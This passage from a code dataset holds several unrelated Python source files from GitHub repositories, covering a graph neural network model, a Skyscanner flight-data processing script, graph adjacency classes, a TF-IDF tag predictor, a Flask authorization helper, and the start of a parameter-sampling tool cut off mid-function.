training=self.training)\n\n #collect output\n attn_output = torch.bmm(attn_output_weights, v)\n attn_output = attn_output.view(batch_num, self.num_heads, node_num, self.vdim).transpose(-2,-3).contiguous().view(batch_num, node_num, self.v_embed_dim)\n attn_output = self.out_proj(attn_output)\n\n\n if need_weights:\n attn_output_weights = attn_output_weights #view: (batch_num, num_heads, node_num, node_num)\n return attn_output, attn_output_weights.sum(dim=1) / self.num_heads\n else:\n return attn_output\n\n\n#Graphsage layer\nclass SageConv(Module):\n \"\"\"\n Simple Graphsage layer\n \"\"\"\n\n def __init__(self, in_features, out_features, bias=False):\n super(SageConv, self).__init__()\n\n self.proj = nn.Linear(in_features*2, out_features, bias=bias)\n\n self.reset_parameters()\n\n print(\"note: for dense graph in graphsage, require it normalized.\")\n\n def reset_parameters(self):\n\n nn.init.normal_(self.proj.weight)\n\n if self.proj.bias is not None:\n nn.init.constant_(self.proj.bias, 0.)\n\n def forward(self, adj, features):\n \"\"\"\n Args:\n adj: can be sparse or dense matrix.\n \"\"\"\n\n #fuse info from neighbors. to be added:\n if not isinstance(adj, torch.sparse.FloatTensor):\n neigh_feature = torch.bmm(adj, features) / (adj.sum(dim=1).reshape((adj.shape[0], adj.shape[1],-1))+1)\n else:\n print(\"spmm not implemented for batch training. 
 neigh_feature = torch.spmm(adj, features)\n\n #perform conv\n data = torch.cat([features,neigh_feature], dim=-1)\n combined = self.proj(data)\n\n return combined\n\n\n###models###\n\n#GraphSage Like encoder\nclass Encoder(Module):\n \"\"\"\n Simple Graphsage-like encoder\n \"\"\"\n\n def __init__(self, nfeat, nhid, nembedding, dropout=0.1, \n layer_num = 2, \n feature_pre = True,\n feature_dim = None,\n jump = False):\n\n super(Encoder, self).__init__()\n self.layer_num = layer_num\n self.dropout = dropout\n self.feature_pre = feature_pre\n\n if feature_pre:\n feature_dim = nfeat//4\n self.linear_pre = nn.Linear(nfeat, feature_dim)\n nn.init.normal_(self.linear_pre.weight)\n self.conv_first = SageConv(feature_dim, nhid)\n else:\n self.conv_first = SageConv(nfeat, nhid)\n self.conv_hidden = nn.ModuleList([SageConv(nhid+nfeat, nhid) for i in range(layer_num - 2)])\n self.conv_out = SageConv(nhid+nfeat, nembedding)\n \n\n def forward(self, adj, x):\n \"\"\"\n Args:\n adj: can be sparse or dense matrix.\n \"\"\"\n feat = x\n if self.feature_pre:\n x = self.linear_pre(x)\n x = self.conv_first(adj, x)\n x = F.relu(x)\n\n if self.dropout:\n x = F.dropout(x, training=self.training)\n for i in range(self.layer_num-2):\n x = torch.cat([x,feat], dim=-1)\n x = self.conv_hidden[i](adj, x)\n x = F.relu(x)\n if self.dropout:\n x = F.dropout(x, training=self.training)\n\n x = torch.cat([x,feat], dim=-1)\n x = self.conv_out(adj, x)\n\n return x\n\n\n#attr/attr+pos decoder\nclass Decoder(Module):\n \"\"\"\n Attention-based decoder for node attributes and/or positions.\n \"\"\"\n\n def __init__(self, npos, nhid, nfeat, args, dropout=0.1, need_x = True):\n super(Decoder, self).__init__()\n self.dropout = dropout\n\n self.MulHead_pos = MultiHead(npos, 8, embed_dim=8*npos, dropout = self.dropout)\n self.args = args\n self.decode_pre = args.decode_pre\n self.need_x = need_x\n\n n_combine = npos + nhid\n\n if need_x:\n self.MulHead_x = MultiHead(npos, 8, vdim = nhid, v_embed_dim = 8*nhid , dropout = self.dropout)\n\n \n self.MLP_x_1 = nn.Linear(n_combine, n_combine*2)\n self.MLP_x_2 = nn.Linear(n_combine*2, nfeat)\n\n\n self.de_weight = Parameter(torch.FloatTensor(n_combine, n_combine))\n\n self.reset_parameters()\n\n\n def reset_parameters(self):\n
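 # uniform init with bound 1/sqrt(fan) for the dense decode weight; the MLPs\n # below keep the normal init used elsewhere in this file\n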
 stdv = 1. / math.sqrt(self.de_weight.size(1))\n self.de_weight.data.uniform_(-stdv, stdv)\n\n nn.init.normal_(self.MLP_x_1.weight)\n nn.init.normal_(self.MLP_x_2.weight)\n\n def forward(self, x_embed, pos_embed):\n if self.decode_pre:\n pos = self.MulHead_pos(pos_embed, pos_embed, pos_embed)\n\n if x_embed is not None and self.need_x:\n x = self.MulHead_x(pos_embed, pos_embed, x_embed)\n combine = torch.cat([x,pos], dim=-1)\n x_out = self.MLP_x_2(F.relu(self.MLP_x_1(combine)))\n else:\n combine = pos\n x_out = None\n \n elif x_embed is not None and self.need_x:\n #x = self.MulHead_x(pos_embed, pos_embed, x_embed)\n combine = torch.cat([x_embed,pos_embed], dim=-1)\n x_out = self.MLP_x_2(F.relu(self.MLP_x_1(combine)))\n\n #if self.args == 'checkpoint_nopos':\n # combine = x_embed\n \n else:\n combine = torch.cat([x_embed,pos_embed], dim=-1)\n x_out = None\n\n #predict adj matrix\n #adj_out = F.tanh(torch.bmm(combine, combine.transpose(-1,-2)))\n combine = F.linear(combine, self.de_weight)\n adj_out = torch.sigmoid(torch.bmm(combine, combine.transpose(-1,-2)))\n\n return adj_out,x_out\n\n \n\n#global readout\nclass ReadOut(Module):\n \"\"\"\n Global sum readout over the node dimension.\n \"\"\"\n\n def __init__(self, ):\n super(ReadOut, self).__init__()\n\n\n def forward(self, X):\n\n\n return X.sum(dim=1)\n\n\n#Translator\nclass Translator(Module):\n \"\"\"\n MLP that fuses node features with the broadcast global feature.\n \"\"\"\n\n def __init__(self, nhid, nfeat, bias=False):\n super(Translator, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid, nhid*3, bias)\n self.MLP_2 = nn.Linear(nhid*3, nfeat, bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, node_feat, glob_feat):\n combined = torch.cat([node_feat,glob_feat.view(glob_feat.shape[0], 1, glob_feat.shape[-1]).expand(glob_feat.shape[0],node_feat.shape[1],-1)], dim=-1)\n\n out = self.MLP_2(F.relu(self.MLP_1(combined)))\n\n\n return out\n\n#discriminator based on global feature\nclass Glob_Discriminator(Module):\n \"\"\"\n a simple implementation of discriminator based on the global Readout vector\n \"\"\"\n\n def __init__(self, nhid, bias=True):\n super(Glob_Discriminator, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid+nhid, nhid, bias)\n self.MLP_2 = nn.Linear(nhid, 2, bias)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, glob_feat_a, glob_feat_b, T=5):\n #ipdb.set_trace()\n out = self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1)))) # get the probability of being real\n #out = F.softmax(self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1))))/T)[:,0] # get the probability of being real\n\n return out\n\n#MI estimator based on paired global feature\n\nclass Glob_MINE(Module):\n \"\"\"\n a simple implementation of Mutual Information Neural Estimation based on the global Readout vector\n \"\"\"\n\n def __init__(self, nhid, bias=True):\n super(Glob_MINE, self).__init__()\n\n self.MLP_1 = nn.Linear(nhid+nhid, nhid, bias)\n self.MLP_2 = nn.Linear(nhid, 2, bias=False)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.normal_(self.MLP_1.weight)\n nn.init.normal_(self.MLP_2.weight)\n\n def forward(self, glob_feat_a, glob_feat_b):\n out = self.MLP_2(F.relu(self.MLP_1(torch.cat([glob_feat_a, glob_feat_b], dim=-1))))\n\n return 
out\n\n\n\n","repo_name":"TianxiangZhao/SemiGraphTranslation","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37788949922","text":"import simplejson as json\nimport datetime as dt\nimport time\nimport re\nimport numpy as np\nimport pandas as pd\nfrom sys import argv, exit\nfrom glob import glob\nfrom pprint import pprint as pp\nimport random\nrandom.seed(321)\n\ndef clean_none(data):\n\tnew_data = []\n\tfor i in data:\n\t\tif i is None:\n\t\t\tcontinue\n\t\tnew_data.append(i)\n\treturn new_data\n\t\n\ndef add_leg_info_to_row(row, leg):\n\trow.append(leg['Departure'])\n\trow.append(leg['Arrival'])\n\trow.append(leg['Duration'])\n\trow.append(leg['JourneyMode'])\n\trow.append(leg['OriginStation'])\n\trow.append(leg['DestinationStation'])\n\trow.append(len(leg['Stops']))\n\n\tfor i in range(3):\n\t\tif len(leg['Stops']) >= i + 1:\n\t\t\tif leg['Stops'][i] is None:\n\t\t\t\trow.append('NaN')\n\t\t\telse:\n\t\t\t\trow.append(leg['Stops'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\tfor i in range(3):\n\t\tif len(leg['OperatingCarriers']) >= i + 1:\n\t\t\trow.append(leg['OperatingCarriers'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\tfor i in range(3):\n\t\tif len(leg['Carriers']) >= i + 1:\n\t\t\trow.append(leg['Carriers'][i])\n\t\telse:\n\t\t\trow.append('NaN')\n\n\ndef add_place_info_to_row(dicio, row, row_station):\n\tfor place in dicio['Places']:\n\t\t\tif place['Id'] == row[row_station]:\n\t\t\t\trow.append(place['Name'])\n\t\t\t\trow.append(place['Type'])\n\n\ndef json_to_lists(dicio):\n\t\n\trows = []\n\n\t# clean the itinerary and drop irrelevant information\n\tfor itinerarie in dicio['Itineraries']:\n\t\tp_count = 0\n\t\tfor option in itinerarie['PricingOptions']:\n\t\t\tfor agent in option['Agents']:\n\t\t\t\trow = []\n\t\t\t\trow.append(option['Price']) # add price\n\t\t\t\tp_count += 1 \n\t\t\t\trow.append(option['QuoteAgeInMinutes']) # add QAgeInMin\n\t\t\t\trow.append(agent)\n\t\t\t\trow.append(itinerarie['InboundLegId'])\t\t\t\t\t\t \n\t\t\t\trow.append(itinerarie['OutboundLegId'])\n\t\t\t\trows.append(row)\n\t\t\t\n\t\t\tif p_count > 5:\n\t\t\t\tbreak\n\t\tif p_count > 5:\n\t\t\t\tbreak\n\n\n\t# row format:\n\t# [price, QAgInMin, Agent, InId, OutId]\n\n\t# clean the agents and add the relevant info to the observations\n\tfor row in rows:\n\t\tfor agent in dicio['Agents']:\n\t\t\tif agent['Id'] == row[2]: # if the row Id and the agent Id match\n\t\t\t\trow.append(agent['Name'])\n\t\t\t\trow.append(agent['OptimisedForMobile'])\n\t\t\t\trow.append(agent['Status'])\n\t\t\t\trow.append(agent['Type'])\n\t# row format:\n\t# [price, QAgInMin, Agent, InId, OutId,\n\t# ag_nome, ag_optMobile, ag_stat, ag_type]\n\n\t# clean the legs and add the relevant info to the observations\n\tvolta_check = False\n\tfor row in rows:\n\t\t\n\t\tfor leg in dicio['Legs']:\n\n\t\t\t# outbound leg information\n\t\t\tif leg['Id'] == row[4]: # if the row OutId and the leg Id match\n\t\t\t\tadd_leg_info_to_row(row, leg)\n\t\t\t\t\n\t\t\t\t# found the outbound leg, now look for the return leg\n\t\t\t\t# note: there is not always a return leg\n\t\t\t\tfor volta_leg in dicio['Legs']:\n\n\t\t\t\t\t# return leg information (note: there is not always a return leg)\n\t\t\t\t\tif volta_leg['Id'] == row[3]:\n\t\t\t\t\t\tadd_leg_info_to_row(row, volta_leg)\n\t\t\t\t\t\tvolta_check = True\n\n\t\t\t\t# if no return leg was found, pad the fields with 'NaN'\n\t\t\t\tif not volta_check:\n
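\t\t\t\t\t# keeps every row the same width so the DataFrame columns align later\n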
\t\t\t\t\tfor unused in range(15):\n\t\t\t\t\t\trow.append('NaN')\n\n\t# row format:\n\t# [price(0), QAgInMin(1), Agent(2), InId(3), OutId(4),\n\t# ag_nome(5), ag_optMobile(6), ag_stat(7), ag_type(8)\n\t# out_saida(9), out_chegada(10), out_dura(11), out_jMode(12),\n\t# \tout_orStat(13), out_desStat(14), out_stops(15), out_stop1(16),\n\t#\tout_stop2(17), out_stop3(18), out_OpCarr1(19), out_OpCarr2(20),\n\t#\tout_OpCarr3(21), out_carr1(22), out_carr2(23), out_carr3(24)\n\t# in_saida(25), in_chegada(26), in_dura(27), in_jMode(28), in_orStat(29),\n\t#\tin_desStat(30), in_stops(31), in_stop1(32), in_stop2(33), in_stop3(34),\n\t#\tin_OpCarr1(35), in_OpCarr2(36), in_OpCarr3(37), in_carr1(38),\n\t#\tin_carr2(39), in_carr3(40)]\n\t\t\n\n\t# clean the places and add the relevant info to the observations\n\tfor row in rows:\n\t\tadd_place_info_to_row(dicio, row, 13)\n\t\tadd_place_info_to_row(dicio, row, 14)\n\n\t\tif volta_check:\n\t\t\tadd_place_info_to_row(dicio, row, 29)\n\t\t\tadd_place_info_to_row(dicio, row, 30)\n\t\telse:\n\t\t\tfor unused in range(4):\n\t\t\t\trow.append('NaN')\n\n\t# row format:\n\t# row + [ida_or_nome(41), ida_or_tipo(42), ida_dest_nome(43),\n\t#\tida_dest_tipo(44)\n\t# volta_or_nome(45), volta_or_tipo(46), volta_dest_nome(47),\n\t#\tvolta_dest_tipo(48)]\n\n\t# collection time: add the relevant info to the observations\n\tfor row in rows:\n\t\tt = dicio['hora_coleta']\n\t\tt_col = dt.datetime(t[0], t[1], t[2], t[3], t[4], t[5])\n\t\trow.append(t_col)\n\n\t\tt_ida = time.strptime(row[9], \"%Y-%m-%dT%H:%M:%S\")\n\t\tt_ida = dt.datetime(*t_ida[0:6])\n\t\tt_delta_ida = t_ida - t_col\n\t\trow.append(t_delta_ida.days)\n\n\t\tt_volta = time.strptime(row[25], \"%Y-%m-%dT%H:%M:%S\")\n\t\tt_volta = dt.datetime(*t_volta[0:6])\n\t\tdura_viagem = t_volta - t_ida\n\t\trow.append(dura_viagem.days)\n\t\t\n\t\tfor t_coleta in dicio['hora_coleta'][6:]:\n\t\t\trow.append(t_coleta)\n\n\t# row format:\n\t# row + [col_time(49), t_delta_ida(50), dura_viagem(51), col_wday(52),\n\t# col_yday(53), col_isds(54)]\t\n\t\n\treturn rows\n\n\ndef process(jsons):\n\tdata = clean_none(jsons)\n\n\ttable = np.array(json_to_lists(data[0]))\n\n\t# check that the first array of the table is not empty;\n\t# only continue once the table starts with a non-empty array\n\ti = 1\n\twhile table.shape[0] == 0:\n\t\ttable = np.array(json_to_lists(data[i]))\n\t\ti += 1\n\n\n\tfor dicio in data:\n\t\t\t\t\n\t\t# if there are no trips in this dict\n\t\tif dicio['Itineraries'] == []:\n\t\t\tcontinue\n\t\t\n\t\tarr = np.array(json_to_lists(dicio))\n\t\ttable = np.concatenate((table, arr), axis=0)\n\n\tdf = pd.DataFrame(table)\n\tdf.columns = ['preco', 'qAgInMin', 'agent', 'inId', 'outId', 'ag_nome',\n\t 'ag_optMobile', 'ag_stat', 'ag_type',\n\t 'out_saida', 'out_chegada', 'out_dura', 'out_jMode', 'out_orStat',\n\t\t'out_desStat', 'out_stops', 'out_stop1', 'out_stop2', 'out_stop3',\n\t\t'out_opCarr1','out_opCarr2', 'out_opCarr3', 'out_carr1', 'out_carr2',\n\t\t'out_carr3',\n\t 'in_saida', 'in_chegada', 'in_dura', 'in_jMode', 'in_orStat', 'in_desStat',\n\t\t'in_stops', 'in_stop1', 'in_stop2', 'in_stop3', 'in_opCarr1',\n\t\t'in_opCarr2', 'in_opCarr3', 'in_carr1', 'in_carr2', 'in_carr3',\n\t 'ida_or_nome', 'ida_or_tipo', 'ida_dest_nome', 'ida_dest_tipo',\n\t 'volta_or_nome', 'volta_or_tipo', 'volta_dest_nome', 'volta_dest_tipo',\n\t 'col_time', 't_delta_ida', 'dura_viagem', 'col_wday', 'col_yday',\n\t 'col_isds']\n\n\t# create a trip id in the format YYYYMMDDHHDurDur\n
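\t# e.g. departure 2016-09-03 14:00 on a 4-day trip gives vid 201609031400 + 4\n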
\tdf['vid'] = pd.to_datetime(df['out_saida'], format='%Y-%m-%dT%H:%M:%S')\n\tdf['vid'] = df['vid'].map(\n\t\tlambda x: 100000000*x.year + 1000000*x.month + 10000*x.day + 100*x.hour)\n\tdf['vid'] = df['vid'] + df['dura_viagem']\n\n\treturn df\n\n\ndef load_CSVs(path, var_list, max_files='All', n_days = 5):\n\t# defensive check\n\tif 'col_yday' not in var_list:\n\t\tvar_list.append('col_yday')\n\n\tallFiles = glob(path)\n\trandom.shuffle(allFiles)\n\n\tif max_files != 'All':\n\t\tallFiles = allFiles[:max_files]\n\tprint(\"Loading %d day(s)...\" % n_days)\n\tframe = pd.DataFrame()\n\tlist_ = []\n\n\tcateg_var = ['ag_type', 'agent', 'out_orStat', 'out_desStat', 'out_opCarr1',\n\t\t'out_opCarr2', 'out_opCarr3', 'in_opCarr1', 'in_opCarr2', 'in_opCarr3',\n\t\t'in_orStat', 'in_desStat', 'in_carr1', 'in_carr2', 'in_carr3',\n\t\t'out_carr1', 'out_carr2', 'out_carr3', 'in_jMode', 'out_jMode',\n\t\t'in_orStat', 'ida_or_nome', 'ida_or_tipo', 'ida_dest_tipo',\n\t\t'ida_dest_nome', 'volta_or_nome', 'volta_or_tipo', 'volta_dest_tipo',\n\t\t'volta_dest_nome', 'ag_nome', 'ag_stat', 'in_stop1', 'in_stop2',\n\t\t'in_stop3', 'out_stop1', 'out_stop2', 'out_stop3']\n\t\n\tdate_time_var = ['out_saida', 'out_chegada', 'in_saida', 'in_chegada']\n\t\n\tseen_days = []\n\twhile len(seen_days) + 1 <= n_days:\n\t\tfile = allFiles.pop()\n\n\t\t# defensive check\n\t\tif file[-4:] != '.csv':\n\t\t\tprint('File %s is not in the expected format' % file)\n\t\t\tprint(\"File must be a df in csv format, sep = ';'\")\n\t\t\texit(1)\n\n\t\tdf = pd.read_csv(file, sep = ';', header = 0, usecols = var_list)\n\t\n\t\t\t\n\t\tif df.col_yday.unique()[0] not in seen_days:\n\t\t\tseen_days.append(df.col_yday.unique()[0])\n\n\t\tlist_.append(df)\n\n\tframe = pd.concat(list_, ignore_index=True)\n\t\t\n\tvars_in_frame = frame.columns\n\t# convert to the right types\n\tfor var in categ_var:\n\t\tif var in vars_in_frame:\n\t\t\tframe[var] = frame[var].astype('category')\n\n\tfor var in date_time_var:\n\t\tif var in vars_in_frame:\n\t\t\tframe[var] = np.array(frame[var], dtype='datetime64')\n\treturn frame\n\n\ndef data_split(frame, shuffle = False, test_stize = 0.2, test_days = 1):\n\t\n\tif shuffle:\n\t\tframe = frame.iloc[np.random.permutation(len(frame))]\n\t\tframe = frame.reset_index(drop=True)\n\t\tif test_stize > 1 or test_stize < 0:\n\t\t\tprint('Test set size must be at most 1')\n\t\t\texit(1)\n\n\t\tmsk = np.random.rand(len(frame)) < 1 - test_stize\n\t\ttrain = frame[msk]\n\t\ttest = frame[~msk]\n\t\n\telse:\n\t\tframe.sort_values(by=['col_yday'], ascending=[True], inplace = True)\n\t\tdays = frame.col_yday.unique()\n\t\tprint(days)\n\n\t\tprint(days[-test_days:])\n\t\ttest = frame.loc[frame['col_yday'].isin(days[-test_days:])]\n\t\ttrain = frame.loc[~frame['col_yday'].isin(days[-test_days:])]\n\n\treturn train, test\n\n\ndef make_folds(training_df, folds = 3):\n\t\n\tdays = training_df.col_yday.unique()\n\tn_days = len(days)\n\n\ttrain = []\n\n\t# build the folds\n\tif folds and n_days > 2 and n_days % folds == 0:\n\t\tdays_per_fold = int(n_days / folds)\n\t\tfor i in range(0, n_days, days_per_fold):\n\t\t\t\n\t\t\tsv = (training_df['col_yday'] >= days[i]) \n\t\t\tsv = sv & (training_df['col_yday'] <= days[i + days_per_fold - 1])\n\t\t\tprint('Fold: ', training_df[sv].col_yday.unique())\n\t\t\ttrain.append(training_df[sv])\n\n\telse:\n\t\tprint('Could not create the folds')\n\t\treturn training_df\n\n\treturn train \n\n\n\n\nif __name__ == '__main__':\n\n\t\t\n\tfiles = argv[1:] # grab the files\n\tfor file in files:\n\t\t\n\t\t# ensure proper usage\n\t\tif 
file[-5:] != '.json':\n\t\t\tprint('Usage: \\n `python3 skyscannerfile.json` or\\n '\\\n\t\t\t\t'`python3 *.json` ')\n\t\t\tprint('File %s is not in the expected format' % file)\n\t\t\texit(1)\n\n\t\t# read the file\n\t\twith open(file, 'r') as in_file:\n\t\t\tdata = json.load(in_file)\n\n\n\t\t# process the data into a data frame\n\t\tprint('\\nProcessing %s ...' % file)\n\t\tt0 = time.time()\n\t\tpdata = process(data)\n\t\tprint('Time to process %s:' % file, round(time.time()-t0, 3), 's')\n\n\t\t# save to csv\n\t\tout_file = file[0:-5] + '.csv'\n\t\tprint('\\nSaving %s ...' % out_file)\n\n\t\tt0 = time.time()\n\t\tpdata.to_csv(out_file, sep = ';', date_format = '%Y', index = False)\n\t\tprint('Time to save %s:' % out_file, round(time.time()-t0, 3), 's')\n\t\tprint('\\n')\n\n\n","repo_name":"matheusfacure/Passagens","sub_path":"tools/process_skyscanner.py","file_name":"process_skyscanner.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12568384066","text":"# import json\r\n\r\n\r\nclass Graph(object):\r\n _graph = None\r\n\r\n def __init__(self, f_path):\r\n with open(f_path) as f:\r\n is_oriented = \"->\" in f.readline()\r\n # print(\"oriented = {}\".format(is_oriented))\r\n self.n_vertex, self.n_edge = map(int, f.readline().strip().split())\r\n self.vertex_pairs = {}\r\n for i in f.readlines():\r\n edge_info = [int(j) for j in i.strip().split()]\r\n self.vertex_pairs[(edge_info[0], edge_info[1])] = 1 if len(edge_info) == 2 else edge_info[2]\r\n \r\n # print(\"{}\\n{}\\n{}\".format(self.n_vertex, self.n_edge, \"\\n\".join([str(k) for k in self.vertex_pairs])))\r\n self.build_graph(self.vertex_pairs, is_oriented)\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n raise NotImplementedError\r\n\r\n def neighbours(self, v):\r\n raise NotImplementedError\r\n\r\n def weight(self, u, v):\r\n return self.vertex_pairs[(u, v)]\r\n\r\n\r\nclass AdjacencyMatrix(Graph):\r\n \"\"\"For small graphs\"\"\"\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n self._graph = [[0 for _ in range(self.n_vertex)] for _ in range(self.n_vertex)]\r\n for i, j in vertex_pairs:\r\n self._graph[i][j] = 1\r\n if not is_oriented:\r\n self._graph[j][i] = 1\r\n # print(json.dumps(self._graph, indent=1))\r\n\r\n def neighbours(self, v):\r\n return (i for i in range(self.n_vertex) if self._graph[v][i])\r\n\r\n def __str__(self):\r\n return \"\\n\".join([\" \".join([str(self._graph[i][j]) for j in range(self.n_vertex)]) for i in range(self.n_vertex)])\r\n\r\n\r\nclass AdjacencySet(Graph):\r\n \"\"\"For big graphs with not so big number of edges\"\"\"\r\n\r\n def build_graph(self, vertex_pairs, is_oriented):\r\n self._graph = [set() for _ in range(self.n_vertex)]\r\n for i, j in vertex_pairs:\r\n self._graph[i].add(j)\r\n if not is_oriented:\r\n self._graph[j].add(i)\r\n # print(json.dumps(self._graph, indent=1))\r\n\r\n def neighbours(self, v):\r\n return (i for i in self._graph[v])\r\n\r\n def __str__(self):\r\n return \"\\n\".join([\" \".join([str(i)] + [str(j) for j in self._graph[i]]) for i in range(self.n_vertex)])\r\n\r\n\r\nadj_m_1 = AdjacencyMatrix(\"graph_example_1.txt\")\r\nadj_s_1 = AdjacencySet(\"graph_example_1.txt\")\r\nadj_m_2 = AdjacencyMatrix(\"graph_example_2.txt\")\r\nadj_s_2 = AdjacencySet(\"graph_example_2.txt\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # import networkx as nx\r\n print(\"Example 1:\")\r\n print(\"AdjacencyMatrix:\\n\" + str(adj_m_1))\r\n
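 # illustrative sanity check: both classes expose the same neighbours() API,\r\n # so they are interchangeable in traversal code\r\n assert sorted(adj_m_1.neighbours(0)) == sorted(adj_s_1.neighbours(0))\r\n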
print(\"AdjacencySet:\\n\" + str(adj_s_1))\r\n print(\"Example 2:\")\r\n print(\"AdjacencyMatrix:\\n\" + str(adj_m_2))\r\n print(\"AdjacencySet:\\n\" + str(adj_s_2))\r\n # print(\"Adjacency LIST:\\n{}\".format(adj_s_2._graph))\r\n","repo_name":"Guitar1st/InterviewPreparation","sub_path":"PythonCode/GraphsAlgo/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3726959314","text":"# IMPORTING MODEL\r\nimport joblib\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.preprocessing import MultiLabelBinarizer\r\ndf = pd.read_csv(\"dataset/Tags.csv\")\r\ndf1 = df.dropna()\r\nimport ast\r\ndf1['Tag'] = df1['Tag'].apply(lambda x: ast.literal_eval(x))\r\n\r\ntagPredictorModel = joblib.load('tag_predictor.pkl')\r\ntfidf = TfidfVectorizer (analyzer='word', max_features=10000, ngram_range=(1,3), stop_words='english')\r\nX = tfidf.fit_transform(df1['Body'].values.astype(str))\r\nmultilabel = MultiLabelBinarizer()\r\ny=df1['Tag'] \r\ny=multilabel.fit_transform(y)\r\n\r\ndef getTags(question):\r\n question = tfidf.transform(question)\r\n tags = multilabel.inverse_transform(tagPredictorModel.predict(question))\r\n print(tags)\r\n return tags","repo_name":"kuttypaiyaa-prakash/TagPredict","sub_path":"tag_predictor.py","file_name":"tag_predictor.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33853019932","text":"import datetime\n\nfrom flask import abort, current_app, jsonify, make_response, request, url_for\n\nfrom . import api, exceptions, redirect\n\n\ndef authorize(permission, resource_class=None, resource='', ctx=None):\n if current_app.config.get('TINYAUTH_BYPASS', False):\n return {\n 'Authorized': True,\n }\n\n context = {\n 'SourceIp': request.remote_addr,\n 'RequestDateTime': datetime.datetime.utcnow().isoformat(),\n }\n context.update(ctx or {})\n\n if resource_class:\n resource_arn = api.format_arn(resource_class, resource)\n else:\n resource_arn = api.get_arn_base()\n\n return api.call('authorize-by-token', {\n 'permit': {\n permission: [resource_arn],\n },\n 'headers': request.headers.to_wsgi_list(),\n 'context': context,\n })\n\n\ndef authorize_or_401(permission, resource_class=None, resource='', ctx=None):\n try:\n authorized = authorize(permission, resource_class, resource, ctx)\n except exceptions.AuthorizationFailed:\n abort(make_response(jsonify({'Authorized': False}), 401))\n\n if authorized['Authorized'] is not True:\n abort(make_response(jsonify(authorized), 401))\n\n return authorized\n\n\ndef authorize_or_login(permission, resource_class=None, resource='', ctx=None):\n try:\n authorized = authorize(permission, resource_class, resource, ctx)\n except exceptions.AuthorizationFailed:\n raise redirect.Redirect(url_for('login.login'))\n\n if authorized['Authorized'] is not True:\n raise redirect.Redirect(url_for('login.login'))\n\n return authorized\n\n\ndef authorize_or_raise(permission, resource_class=None, resource='', ctx=None):\n authorized = authorize(permission, resource_class, resource, ctx)\n\n if authorized['Authorized'] is not True:\n raise exceptions.AuthorizationFailed()\n\n return 
authorized\n","repo_name":"tinyauth/flask_tinyauth","sub_path":"flask_tinyauth/authorize.py","file_name":"authorize.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12827837254","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Bilal Syed Hussain\n\n\"\"\"\nUsage:\n nsample (iterations|time|cpu) \n ( --essence= --models_timeout= --influence_radius= --info= )\n [ --working_dir=
--seed= --output_dir= --mode= --radius_as_percentage= --use_minion= --pre_generate= --generated_dir= --timeout= ]\n nsample json \n\n`time ` is the total time the program can take.\n`json` allows reloading of the state including the seed.\n\nOptions:\n --help Show this screen.\n --influence_radius= Radius for the acceptance function.\n --essence= Essence file.\n --mode= Conjure mode used [default: df].\n --models_timeout= Timeout in seconds.\n --output_dir= Where to put the results.\n --radius_as_percentage= Radius setting as a % [default: false].\n --seed= Random seed to use.\n --working_dir= Where the essence file is [default: .]\n --info= File that contains the ordering of the variables\n --use_minion= Uses Minion to generate params [default: true]\n --pre_generate= When using Minion, generate all solutions once and pick from them [default: false]\n --generated_dir= Directory to place all solutions, specs, which can be reused between runs\n --timeout= Timeout method to use [default: simple]\n\n\n\"\"\"\n\nfrom lib import domains\nfrom lib import instances\nfrom lib import chain_lib\nfrom lib import method\nfrom lib import option_handing\nfrom lib import timeout\n\nfrom collections import namedtuple\nimport logging\nimport random\n\nlogger = logging.getLogger(__name__)\nSettings = namedtuple('Settings', ['seed', 'mode', 'models_timeout', \"essence\", \"working_dir\", \"output_dir\",\n \"limit\", \"influence_radius\", \"radius_as_percentage\", \"use_minion\",\n \"generated_dir\", \"pre_generate\"])\n\n\nclass NSample(method.Method):\n def __init__(self, options, limiter, info):\n super(NSample, self).__init__(options, limiter, Settings, info)\n self.rejected_series = 0\n\n def before_settings(self, options):\n return self.do_timeout_way(self.do_radius_as_percentage(options))\n\n def goodness(self, point):\n\n def avg_quality(rp):\n # TODO: could be made more efficient\n influence_points = [ p for p in self.data_points\n if self.shape.is_in_inside(self.settings.influence_radius, rp, p) ]\n\n if (len(influence_points) == 0):\n logger.info(\"no influence_points\")\n return 0.5\n\n logger.info(\"len(influence_points) %s len(data_points) %s \",\n len(influence_points), len(self.data_points))\n\n quailties = [self.get_quailty(p) for p in influence_points]\n logger.info(quailties)\n\n mean = sum(quailties) / len(quailties)\n return mean\n\n # Should weight the influence by how far away the point is\n quailty = avg_quality(point)\n return 1 - quailty\n\n\n def do_iteration(self):\n x = self.random_point()\n\n logger.info(\"made point x %s\", x)\n logger.info(\"X %s\", self.point_pretty(x))\n\n goodness_x = self.goodness(x)\n\n if len(self.data_points) > 1:\n goodness_x_prev = 1 - self.get_quailty(self.data_points[-1])\n logger.info(\"Using previous data point\")\n else:\n 